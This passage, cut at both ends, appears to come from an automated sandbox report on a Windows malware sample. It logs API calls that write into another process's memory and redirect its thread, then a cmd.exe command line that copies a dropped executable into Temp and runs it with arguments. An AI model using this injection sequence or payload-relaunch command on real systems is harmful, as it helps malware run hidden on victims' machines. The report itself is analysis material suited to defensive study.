lpBuffer=0x6849d8, nSize=0x0, lpNumberOfBytesWritten=0x0 | out: lpNumberOfBytesWritten=0x0) returned 0 [0093.825] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x4c7000, lpBuffer=0x6849d8*, nSize=0x54600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x6849d8*, lpNumberOfBytesWritten=0x0) returned 1 [0093.836] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x51c000, lpBuffer=0x6d8fd8*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x6d8fd8*, lpNumberOfBytesWritten=0x0) returned 1 [0093.836] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffd5008, lpBuffer=0x68470c*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x68470c*, lpNumberOfBytesWritten=0x0) returned 1 [0093.836] SetThreadContext (hThread=0x48, lpContext=0x1d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd5000, Edx=0x0, Ecx=0x0, Eax=0x51b2d0, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0093.866] ResumeThread (hThread=0x48) returned 0x1 [0093.866] CloseHandle (hObject=0x48) returned 1 [0093.866] CloseHandle (hObject=0x4c) returned 1 [0093.866] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.867] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0093.867] ExitProcess (uExitCode=0x0) Process: id = "7" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166a0" os_pid = "0xad4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa88" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 460 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 461 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 462 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 463 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 464 start_va = 0x4a0f0000 end_va = 0x4a13bfff entry_point = 0x4a0f0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 465 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 466 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 467 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 468 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 469 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 673 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 674 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 675 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 676 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 677 start_va = 0x4b0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 678 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 679 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 680 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 681 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 682 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 683 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 684 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 685 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 686 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 687 start_va = 0x4c0000 end_va = 0x587fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 688 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 689 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 690 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 691 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 692 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 693 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 694 start_va = 0x590000 end_va = 0x690fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 695 start_va = 0x6a0000 end_va = 0x129ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 696 start_va = 0x12a0000 end_va = 0x1402fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 774 start_va = 0x1410000 end_va = 0x16defff entry_point = 0x1410000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 866 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "nhsgkr2p.exe" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe") Thread: id = 7 os_tid = 0xad8 [0094.091] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fed4 | out: lpSystemTimeAsFileTime=0x26fed4*(dwLowDateTime=0x76fcba80, dwHighDateTime=0x1d440a9)) [0094.091] GetCurrentProcessId () returned 0xad4 [0094.091] GetCurrentThreadId () returned 0xad8 [0094.091] GetTickCount () returned 0x22d08 [0094.092] QueryPerformanceCounter (in: lpPerformanceCount=0x26fecc | out: lpPerformanceCount=0x26fecc*=15088073050) returned 1 [0094.092] GetModuleHandleA (lpModuleName=0x0) returned 0x4a0f0000 [0094.092] __set_app_type (_Type=0x1) [0094.092] __p__fmode () returned 0x76b331f4 [0094.092] __p__commode () returned 0x76b331fc [0094.092] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1121a6) returned 0x0 [0094.092] __getmainargs (in: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c, _DoWildCard=0, _StartInfo=0x4a114140 | out: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c) returned 0 [0094.092] GetCurrentThreadId () returned 0xad8 [0094.093] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xad8) returned 0x38 [0094.093] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0094.093] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0094.093] SetThreadUILanguage (LangId=0x0) returned 0x409 [0094.093] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0094.093] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fe64 | out: phkResult=0x26fe64*=0x0) returned 0x2 [0094.093] VirtualQuery (in: lpAddress=0x26fe9b, lpBuffer=0x26fe34, dwLength=0x1c | out: lpBuffer=0x26fe34*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0094.093] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fe34, dwLength=0x1c | out: lpBuffer=0x26fe34*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0094.093] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fe34, dwLength=0x1c | out: lpBuffer=0x26fe34*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0094.094] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fe34, dwLength=0x1c | out: lpBuffer=0x26fe34*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0094.094] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fe34, dwLength=0x1c | out: lpBuffer=0x26fe34*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0094.094] GetConsoleOutputCP () returned 0x1b5 [0094.094] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0094.094] SetConsoleCtrlHandler (HandlerRoutine=0x4a10e72a, Add=1) returned 1 [0094.094] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.094] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0094.094] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.094] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0094.094] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.094] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0094.094] _get_osfhandle (_FileHandle=0) returned 0x3 [0094.094] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0094.094] _get_osfhandle (_FileHandle=0) returned 0x3 [0094.094] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0094.095] GetEnvironmentStringsW () returned 0x310388* [0094.095] FreeEnvironmentStringsW (penv=0x310388) returned 1 [0094.095] GetEnvironmentStringsW () returned 0x310388* [0094.095] FreeEnvironmentStringsW (penv=0x310388) returned 1 [0094.095] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26edd4 | out: phkResult=0x26edd4*=0x40) returned 0x0 [0094.095] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26eddc, lpData=0x26ede0, lpcbData=0x26edd8*=0x1000 | out: lpType=0x26eddc*=0x0, lpData=0x26ede0*=0x38, lpcbData=0x26edd8*=0x1000) returned 0x2 [0094.095] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26eddc, lpData=0x26ede0, lpcbData=0x26edd8*=0x1000 | out: lpType=0x26eddc*=0x4, lpData=0x26ede0*=0x1, lpcbData=0x26edd8*=0x4) returned 0x0 [0094.095] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26eddc, lpData=0x26ede0, lpcbData=0x26edd8*=0x1000 | out: lpType=0x26eddc*=0x0, lpData=0x26ede0*=0x1, lpcbData=0x26edd8*=0x1000) returned 0x2 [0094.095] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26eddc, lpData=0x26ede0, lpcbData=0x26edd8*=0x1000 | out: lpType=0x26eddc*=0x4, lpData=0x26ede0*=0x0, lpcbData=0x26edd8*=0x4) returned 0x0 [0094.095] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26eddc, lpData=0x26ede0, lpcbData=0x26edd8*=0x1000 | out: lpType=0x26eddc*=0x4, lpData=0x26ede0*=0x40, lpcbData=0x26edd8*=0x4) returned 0x0 [0094.095] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26eddc, lpData=0x26ede0, lpcbData=0x26edd8*=0x1000 | out: lpType=0x26eddc*=0x4, lpData=0x26ede0*=0x40, lpcbData=0x26edd8*=0x4) returned 0x0 [0094.095] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26eddc, lpData=0x26ede0, lpcbData=0x26edd8*=0x1000 | out: lpType=0x26eddc*=0x0, lpData=0x26ede0*=0x40, lpcbData=0x26edd8*=0x1000) returned 0x2 [0094.095] RegCloseKey (hKey=0x40) returned 0x0 [0094.095] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26edd4 | out: phkResult=0x26edd4*=0x40) returned 0x0 [0094.095] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26eddc, lpData=0x26ede0, lpcbData=0x26edd8*=0x1000 | out: lpType=0x26eddc*=0x0, lpData=0x26ede0*=0x40, lpcbData=0x26edd8*=0x1000) returned 0x2 [0094.096] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26eddc, lpData=0x26ede0, lpcbData=0x26edd8*=0x1000 | out: lpType=0x26eddc*=0x4, lpData=0x26ede0*=0x1, lpcbData=0x26edd8*=0x4) returned 0x0 [0094.096] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26eddc, lpData=0x26ede0, lpcbData=0x26edd8*=0x1000 | out: lpType=0x26eddc*=0x0, lpData=0x26ede0*=0x1, lpcbData=0x26edd8*=0x1000) returned 0x2 [0094.096] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26eddc, lpData=0x26ede0, lpcbData=0x26edd8*=0x1000 | out: lpType=0x26eddc*=0x4, lpData=0x26ede0*=0x0, lpcbData=0x26edd8*=0x4) returned 0x0 [0094.096] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26eddc, lpData=0x26ede0, lpcbData=0x26edd8*=0x1000 | out: lpType=0x26eddc*=0x4, lpData=0x26ede0*=0x9, lpcbData=0x26edd8*=0x4) returned 0x0 [0094.096] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26eddc, lpData=0x26ede0, lpcbData=0x26edd8*=0x1000 | out: lpType=0x26eddc*=0x4, lpData=0x26ede0*=0x9, lpcbData=0x26edd8*=0x4) returned 0x0 [0094.096] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26eddc, lpData=0x26ede0, lpcbData=0x26edd8*=0x1000 | out: lpType=0x26eddc*=0x0, lpData=0x26ede0*=0x9, lpcbData=0x26edd8*=0x1000) returned 0x2 [0094.096] RegCloseKey (hKey=0x40) returned 0x0 [0094.096] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886349 [0094.096] srand (_Seed=0x5b886349) [0094.096] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0094.096] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" && 